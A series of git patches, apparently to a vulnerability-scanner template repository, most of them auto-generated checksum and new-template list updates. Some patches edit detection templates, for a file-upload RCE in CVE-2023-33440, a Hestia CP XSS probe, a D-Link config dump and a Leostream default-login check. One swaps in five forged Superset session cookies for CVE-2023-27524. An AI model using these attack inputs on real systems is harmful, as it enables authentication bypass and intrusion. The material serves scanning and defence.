a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -18,6 +18,10 @@ info: metadata: verified: true tags: cve,cve2023,faculty,rce,intrusive + +variables: + email: "{{randstr}}@{{rand_base(5)}}.com" + http: - raw: - | @@ -45,7 +49,7 @@ http: -----------------------------1037163726497 Content-Disposition: form-data; name="email" - admin@admin.com + {{email}} -----------------------------1037163726497 Content-Disposition: form-data; name="password" From de1937af05e9365d02358aded2e64a8f7f0780bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:41:28 +0000 Subject: [PATCH 577/609] Auto Generated New Template Addition List [Mon Jul 10 12:41:28 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6c30bd2130..1b41a22661 100644 --- a/.new-additions +++ b/.new-additions @@ -2,4 +2,5 @@ http/cves/2016/CVE-2016-10973.yaml http/cves/2022/CVE-2022-46071.yaml http/cves/2023/CVE-2023-2982.yaml http/cves/2023/CVE-2023-33338.yaml +http/cves/2023/CVE-2023-33440.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml From 227a11bec639b82b0db9e532588909ebbc996c14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:41:31 +0000 Subject: [PATCH 578/609] Auto Generated Templates Checksum [Mon Jul 10 12:41:31 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b15439b8ce..4bd6067cb3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2239,7 +2239,7 @@ http/cves/2022/CVE-2022-45835.yaml:5f4b590f00df7eff3055f62f3f7808905fec9129 http/cves/2022/CVE-2022-45917.yaml:0226b686f5fd79959cafe8ae966fd89d5a2dbce6 http/cves/2022/CVE-2022-45933.yaml:5e00a22a676d7eda5a57443146b560b0608a1975 http/cves/2022/CVE-2022-46020.yaml:ba3769558e37986e70e73ddd1577bdb353915229 -http/cves/2022/CVE-2022-46071.yaml:5ca0e0d85e2b8eb9aadc2ff2d85e5dc8ea01a24c +http/cves/2022/CVE-2022-46071.yaml:7a01316e0da34b1bfa315ab804196e612bd2e076 http/cves/2022/CVE-2022-46073.yaml:f80767fd442397daf63272de14f15bfdb8b0d4b3 http/cves/2022/CVE-2022-46169.yaml:562e09c425a29df8e43ffcb45dfcf005dd7c6767 http/cves/2022/CVE-2022-46381.yaml:ce9bf2978927607fd30ccf68be73583dfa5ea4c8 @@ -2350,8 +2350,9 @@ http/cves/2023/CVE-2023-31548.yaml:41c807ff8ce21615be1f3f531a0934058fe10154 http/cves/2023/CVE-2023-32235.yaml:2909b3e8f2c2ca01442dee5be54755312d8f5453 http/cves/2023/CVE-2023-32243.yaml:24a096e3028c614b8c2632b25c68fc7a9960646f http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 -http/cves/2023/CVE-2023-33338.yaml:428e6d80c4381571a0b69b78c3c58eaa6e66a0df +http/cves/2023/CVE-2023-33338.yaml:137599b3c500eb857b3f875b4f9a9af15b2fa55f http/cves/2023/CVE-2023-33439.yaml:a4c7ce41b77f99923478040575ac6a72a9cfd5f3 +http/cves/2023/CVE-2023-33440.yaml:c29c1a1a9129f87afc2c2a5c081010f37ff7fb4b http/cves/2023/CVE-2023-33510.yaml:9882010f9db532ca34df9dcf3e62a4d5a92746c6 http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 @@ -6583,7 +6584,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:d5ef1d1c702a959630b21bfad34ba1ff3626183a +templates-checksum.txt:a69e5c6307c36669969cc294096ee247cd513c5b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 04800ddd75ad6978434fd5394e16e5d62513bdbc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:43:00 +0000 Subject: [PATCH 579/609] TemplateMan Update [Mon Jul 10 12:43:00 UTC 2023] :robot: --- http/cves/2023/CVE-2023-33440.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 7d68015b5e..8a5b1150e5 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2023-33440 cwe-id: CWE-434 metadata: + max-request: 2 verified: true tags: cve,cve2023,faculty,rce,intrusive From c6b036ffb9c9580fa4da12170a10de7ef9a0945d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 18:17:56 +0530 Subject: [PATCH 580/609] updated name,info,matcher --- .../{d-link-auth-bypass.yaml => dlink-config-dump.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename http/misconfiguration/{d-link-auth-bypass.yaml => dlink-config-dump.yaml} (85%) diff --git a/http/misconfiguration/d-link-auth-bypass.yaml b/http/misconfiguration/dlink-config-dump.yaml similarity index 85% rename from http/misconfiguration/d-link-auth-bypass.yaml rename to http/misconfiguration/dlink-config-dump.yaml index 9e81457ecf..ce333b408a 100644 --- a/http/misconfiguration/d-link-auth-bypass.yaml +++ b/http/misconfiguration/dlink-config-dump.yaml @@ -1,7 +1,7 @@ -id: d-link-auth-bypass +id: dlink-config-dump info: - name: D-Link DAP-1325 - Broken Access Control + name: D-Link DAP-1325 - Information Disclosure author: gy741 severity: critical description: | @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: title:"D-LINK" - tags: config,dump,dlink,auth-bypass + tags: config,dump,dlink,auth-bypass,disclosure http: - method: GET @@ -25,6 +25,7 @@ http: part: body words: - "Password" + case-insensitive: true - type: regex part: header From d886be11a7e92ecf0fec54709ac536a61b4e1faf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:51:25 +0000 Subject: [PATCH 581/609] Auto Generated New Template Addition List [Mon Jul 10 12:51:25 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1b41a22661..36178b0721 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-40127.yaml http/cves/2016/CVE-2016-10973.yaml http/cves/2022/CVE-2022-46071.yaml http/cves/2023/CVE-2023-2982.yaml From 9c39554d734f9c599b373ef996b034defece1f1f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:51:35 +0000 Subject: [PATCH 582/609] Auto Generated Templates Checksum [Mon Jul 10 12:51:35 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4bd6067cb3..314628702f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,6 +8,7 @@ TEMPLATES-STATS.json:7124209614af6f4ec3e30658be306efe87a09d19 TEMPLATES-STATS.md:4f2deb87b601b234429cf10252ba4c2b9fc4da62 TOP-10.md:dbe627b6ea3081d74929073a986a86c4e82b4130 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 +cves/2022/CVE-2022-40127.yaml:78ab04755e6dbdd15150633b90326037f6ab9e80 cves.json:28095ec889826240f81160ac58822331cf6c3009 cves.json-checksum.txt:831a91aa2026bcf832121030806fa1c64297229f dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c @@ -2352,7 +2353,7 @@ http/cves/2023/CVE-2023-32243.yaml:24a096e3028c614b8c2632b25c68fc7a9960646f http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 http/cves/2023/CVE-2023-33338.yaml:137599b3c500eb857b3f875b4f9a9af15b2fa55f http/cves/2023/CVE-2023-33439.yaml:a4c7ce41b77f99923478040575ac6a72a9cfd5f3 -http/cves/2023/CVE-2023-33440.yaml:c29c1a1a9129f87afc2c2a5c081010f37ff7fb4b +http/cves/2023/CVE-2023-33440.yaml:8b32be170afb039f401474ceb3d64db9ba4fb150 http/cves/2023/CVE-2023-33510.yaml:9882010f9db532ca34df9dcf3e62a4d5a92746c6 http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 @@ -6584,7 +6585,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:a69e5c6307c36669969cc294096ee247cd513c5b +templates-checksum.txt:ee44aa170ffbfb145a6f8ab10fcf7a6ab31c7367 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 26b08df19d65d12fdcac8f26e509bda2a7c55ea8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:53:50 +0000 Subject: [PATCH 583/609] Auto Generated New Template Addition List [Mon Jul 10 12:53:50 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 36178b0721..ef0bc5e604 100644 --- a/.new-additions +++ b/.new-additions @@ -5,3 +5,4 @@ http/cves/2023/CVE-2023-2982.yaml http/cves/2023/CVE-2023-33338.yaml http/cves/2023/CVE-2023-33440.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +http/misconfiguration/dlink-config-dump.yaml From 37c70016ca62f917b849a8398cf945ff1e20e82b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:53:58 +0000 Subject: [PATCH 584/609] Auto Generated Templates Checksum [Mon Jul 10 12:53:58 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 314628702f..cc75a2d432 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -10,7 +10,7 @@ TOP-10.md:dbe627b6ea3081d74929073a986a86c4e82b4130 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 cves/2022/CVE-2022-40127.yaml:78ab04755e6dbdd15150633b90326037f6ab9e80 cves.json:28095ec889826240f81160ac58822331cf6c3009 -cves.json-checksum.txt:831a91aa2026bcf832121030806fa1c64297229f +cves.json-checksum.txt:9bab2f0305df242272d6b1d4c705140126a9e53a dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 @@ -4011,6 +4011,7 @@ http/misconfiguration/default-spx-key.yaml:b8815c33c65aa92ff896625d5fa8a32229620 http/misconfiguration/deos-openview-admin.yaml:98fab8d75655a1d6b6ea59eaa4a3f6ac2e35eb40 http/misconfiguration/dgraph-dashboard-exposure.yaml:8a76047999244d497136d4c8fd1261e7283e3f75 http/misconfiguration/django-debug-detect.yaml:e95386d63f75c688974f558c12b9c88e7e2f3b32 +http/misconfiguration/dlink-config-dump.yaml:d5d3d9818f5e0bf3cb9fa08c18e878f2de8a5127 http/misconfiguration/docker-registry.yaml:3e6795cfc6060e9f44d0983e4ab4b91708211b07 http/misconfiguration/docmosis-tornado-server.yaml:de29fa477373aa022f20a04fa9ac1f247979e2e5 http/misconfiguration/druid-monitor.yaml:e500677a28efb6d0ebc777abd4e956886c08e515 @@ -6585,7 +6586,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:ee44aa170ffbfb145a6f8ab10fcf7a6ab31c7367 +templates-checksum.txt:8490e752de8de6070d07afff36f30f1779c9cab2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 685850abaee5d2820a357b71bae6677b418568a7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 10 Jul 2023 20:34:42 +0530 Subject: [PATCH 585/609] fix-matcher --- http/cves/2023/CVE-2023-3479.yaml | 25 +++++++++++++++++-------- 1 file changed, 17 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 9b4ba51f94..a647186649 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -1,7 +1,7 @@ id: CVE-2023-3479 info: - name: hestiacp/hestiacp prior to 1.7.8 - Cross-Site Scripting + name: Hestiacp <= 1.7.8 - Cross-Site Scripting author: edoardottt severity: medium description: | @@ -14,18 +14,27 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3479 cwe-id: CWE-79 + cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.favicon.hash:-476299640 + verified: true tags: cve,cve2023,hestiacp,xss http: - method: GET path: - - '{{BaseURL}}/templates/pages/debug_panel.php?id=xss">' + - '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}">' + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(content_type, "text/html")' - - 'contains(body, "")' - - 'contains(body, "Hestia Control Panel")' + - type: word + part: body + words: + - 'debug-panel' + - '' condition: and + + - type: status + status: + - 200 From f942b15400e0291415958bb7b22a25f7d7a723da Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 20:41:27 +0530 Subject: [PATCH 586/609] updated matcher --- http/cves/2023/CVE-2023-3479.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index a647186649..0703512cda 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -17,8 +17,8 @@ info: cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-476299640 verified: true + shodan-query: http.favicon.hash:-476299640 tags: cve,cve2023,hestiacp,xss http: @@ -35,6 +35,11 @@ http: - '' condition: and + - type: word + part: header + words: + - text/html + - type: status status: - 200 From 13cf032ac056964f0d59d3e8d423e6822f240ab5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 15:15:10 +0000 Subject: [PATCH 587/609] Auto Generated New Template Addition List [Mon Jul 10 15:15:10 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ef0bc5e604..ca777244f8 100644 --- a/.new-additions +++ b/.new-additions @@ -4,5 +4,6 @@ http/cves/2022/CVE-2022-46071.yaml http/cves/2023/CVE-2023-2982.yaml http/cves/2023/CVE-2023-33338.yaml http/cves/2023/CVE-2023-33440.yaml +http/cves/2023/CVE-2023-3479.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml http/misconfiguration/dlink-config-dump.yaml From c033b1c3e40f5c7b1d62912db48f87eaa81bd824 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 15:15:23 +0000 Subject: [PATCH 588/609] Auto Generated Templates Checksum [Mon Jul 10 15:15:23 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cc75a2d432..9f9325513e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2361,6 +2361,7 @@ http/cves/2023/CVE-2023-34537.yaml:606d34bd1144ac841a29e1a229cfd635b5d8b3b4 http/cves/2023/CVE-2023-34598.yaml:68e4d76fa88dce09b6b339bc9f4b16aef6c211bc http/cves/2023/CVE-2023-34599.yaml:7d4c2c269e401eb61c805a39a5b3cfdb813cf5f8 http/cves/2023/CVE-2023-34659.yaml:5cd78aa16534b8ea075d869ae6a456413859eaf0 +http/cves/2023/CVE-2023-3479.yaml:9afbd77ab68b23a7136325bc2302446df6b914c1 http/cves/2023/CVE-2023-34843.yaml:e005d2e2bce6a97efeaf6a81c4b8d6b236cbfefe http/cves/2023/CVE-2023-34960.yaml:fb3f791de2235951e9ad55d33fbc59e1dd89a546 http/cves/2023/CVE-2023-35843.yaml:c6427155bef898736ce1c5524f31e6a093c8b861 @@ -6586,7 +6587,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:8490e752de8de6070d07afff36f30f1779c9cab2 +templates-checksum.txt:3b2d0d06f6486894bd16a693de60d550d5798838 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 93bf747773db641c0c33a55f8f6e8902067dc7bb Mon Sep 17 00:00:00 2001 From: E1A <57531297+E1A@users.noreply.github.com> Date: Mon, 10 Jul 2023 17:21:35 +0200 Subject: [PATCH 589/609] Update CVE-2023-27524.yaml --- http/cves/2023/CVE-2023-27524.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 0fc950fc8f..82aecff082 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -40,11 +40,11 @@ http: - '10' session: - - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q' - - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ' - - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs' - - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng' - - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI' + - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk' + - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0' + - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM' + - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY' + - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U' attack: clusterbomb stop-at-first-match: true From 48e16d93513adcb08c731d561f051a41eee5c36b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 16:09:33 +0000 Subject: [PATCH 591/609] Auto Generated Templates Checksum [Mon Jul 10 16:09:33 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9f9325513e..7ab780d676 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2324,7 +2324,7 @@ http/cves/2023/CVE-2023-2732.yaml:4c7a4fabba09d411063a937691a2d3d4ca003f9f http/cves/2023/CVE-2023-27350.yaml:ce436afebac78275c225ccd587cd005bf3876503 http/cves/2023/CVE-2023-27372.yaml:d75a7ba52cfbb03254be5a8ac9e16f05caa45768 http/cves/2023/CVE-2023-27482.yaml:7c0352493005b43c7b29dc166a05febe2afb486f -http/cves/2023/CVE-2023-27524.yaml:5d9d1c2f754a3827697cb0bf2ef692674d04ca12 +http/cves/2023/CVE-2023-27524.yaml:ad484e4d60c4e1dd454a75574b448fea4b9e3847 http/cves/2023/CVE-2023-27587.yaml:f97f70657e406ec4c5a14c7f5db0ff46f054582c http/cves/2023/CVE-2023-2780.yaml:dd29bca7f9f6c5e4ecdfa4b29c86a365af626436 http/cves/2023/CVE-2023-28121.yaml:8597360791d1374d994064c71b6cfacb3e5d8ce1 @@ -6587,7 +6587,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:3b2d0d06f6486894bd16a693de60d550d5798838 +templates-checksum.txt:4984984b0e60e622d36cb0d8f16240407e160dac wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3ff56ffef3a5652f8d0951ceec127db3d2ec7c8b Mon Sep 17 00:00:00 2001 From: Brandon Hutchinson Date: Mon, 10 Jul 2023 17:27:32 +0000 Subject: [PATCH 592/609] Update leostream-default-login.yaml --- .../default-logins/leostream/leostream-default-login.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/default-logins/leostream/leostream-default-login.yaml b/http/default-logins/leostream/leostream-default-login.yaml index 2536167320..8901ed07c3 100644 --- a/http/default-logins/leostream/leostream-default-login.yaml +++ b/http/default-logins/leostream/leostream-default-login.yaml @@ -37,8 +37,14 @@ http: part: header words: - "Set-Cookie: lld=%21" + + - type: word + part: header + words: + - 'index.pl' - 'server.pl' - condition: and + - 'status.pl' + condition: or - type: status status: From 8dcd4dded7b72a6d6a4149eb08a9ca7ee4df0639 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 11 Jul 2023 02:24:59 +0530 Subject: [PATCH 593/609] moving files around --- {cves => http/cves}/2022/CVE-2022-40127.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {cves => http/cves}/2022/CVE-2022-40127.yaml (100%) diff --git a/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml similarity index 100% rename from cves/2022/CVE-2022-40127.yaml rename to http/cves/2022/CVE-2022-40127.yaml From f5fedec2edb9eb0ed0cf161cb11b51190767a606 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 20:55:21 +0000 Subject: [PATCH 594/609] Auto Generated New Template Addition List [Mon Jul 10 20:55:21 UTC 2023] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index ca777244f8..18b22c60fa 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,5 @@ -cves/2022/CVE-2022-40127.yaml http/cves/2016/CVE-2016-10973.yaml +http/cves/2022/CVE-2022-40127.yaml http/cves/2022/CVE-2022-46071.yaml http/cves/2023/CVE-2023-2982.yaml http/cves/2023/CVE-2023-33338.yaml From 55e04f5433aa3eef769870c942a5cf57a8b52608 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 20:55:35 +0000 Subject: [PATCH 595/609] Auto Generated Templates Checksum [Mon Jul 10 20:55:35 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7ab780d676..1c83920fe9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,7 +8,6 @@ TEMPLATES-STATS.json:7124209614af6f4ec3e30658be306efe87a09d19 TEMPLATES-STATS.md:4f2deb87b601b234429cf10252ba4c2b9fc4da62 TOP-10.md:dbe627b6ea3081d74929073a986a86c4e82b4130 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves/2022/CVE-2022-40127.yaml:78ab04755e6dbdd15150633b90326037f6ab9e80 cves.json:28095ec889826240f81160ac58822331cf6c3009 cves.json-checksum.txt:9bab2f0305df242272d6b1d4c705140126a9e53a dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c @@ -2179,6 +2178,7 @@ http/cves/2022/CVE-2022-39952.yaml:7c8661c8156efcad32328f85a5bee08c9fd29ce0 http/cves/2022/CVE-2022-39960.yaml:019c80753605d997dd2ada6241cfd6d1400f05d8 http/cves/2022/CVE-2022-40022.yaml:968f886d14011acefd840d1750585b527ad00333 http/cves/2022/CVE-2022-40083.yaml:230f7d1a5000d175f79c0d096ac1e935c641ea70 +http/cves/2022/CVE-2022-40127.yaml:78ab04755e6dbdd15150633b90326037f6ab9e80 http/cves/2022/CVE-2022-40359.yaml:3961f68f8f57ff9cb00ceabf6d6e4b07f3456b99 http/cves/2022/CVE-2022-4050.yaml:dc88f3e0669d61f067a2e463b319c1740630b42d http/cves/2022/CVE-2022-4060.yaml:3eabea18e8e88df56b636a5aa92a2cee8a64b99d @@ -6587,7 +6587,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:4984984b0e60e622d36cb0d8f16240407e160dac +templates-checksum.txt:99ae57d2cb29d33671ed3b462e2c2d5cf00814e7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From b4bb324ac8441e1721399e447b3028ef7167b148 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 11 Jul 2023 04:47:32 +0530 Subject: [PATCH 596/609] token update --- .github/workflows/autoassign.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/autoassign.yml b/.github/workflows/autoassign.yml index 768e6fa520..ed773553ff 100644 --- a/.github/workflows/autoassign.yml +++ b/.github/workflows/autoassign.yml @@ -12,7 +12,7 @@ jobs: permissions: write-all runs-on: ubuntu-latest env: - ASSIGN_TASK_TOKEN: ${{ secrets.GITHUB_TOKEN }} # github personal token + ASSIGN_TASK_TOKEN: ${{ secrets.PDTEAMX_PAT }} # github personal token steps: - name: checkout repo content uses: actions/checkout@v2 # checkout the repository content From c01bb1f42c2bbbba7a0efe24e634bae913509c8e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jul 2023 04:02:09 +0000 Subject: [PATCH 597/609] Auto WordPress Plugins Update [Tue Jul 11 04:02:09 UTC 2023] :robot: --- helpers/wordpress/plugins/complianz-gdpr.txt | 2 +- helpers/wordpress/plugins/disable-gutenberg.txt | 2 +- helpers/wordpress/plugins/google-listings-and-ads.txt | 2 +- helpers/wordpress/plugins/wp-migrate-db.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- helpers/wordpress/plugins/wpcf7-redirect.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - 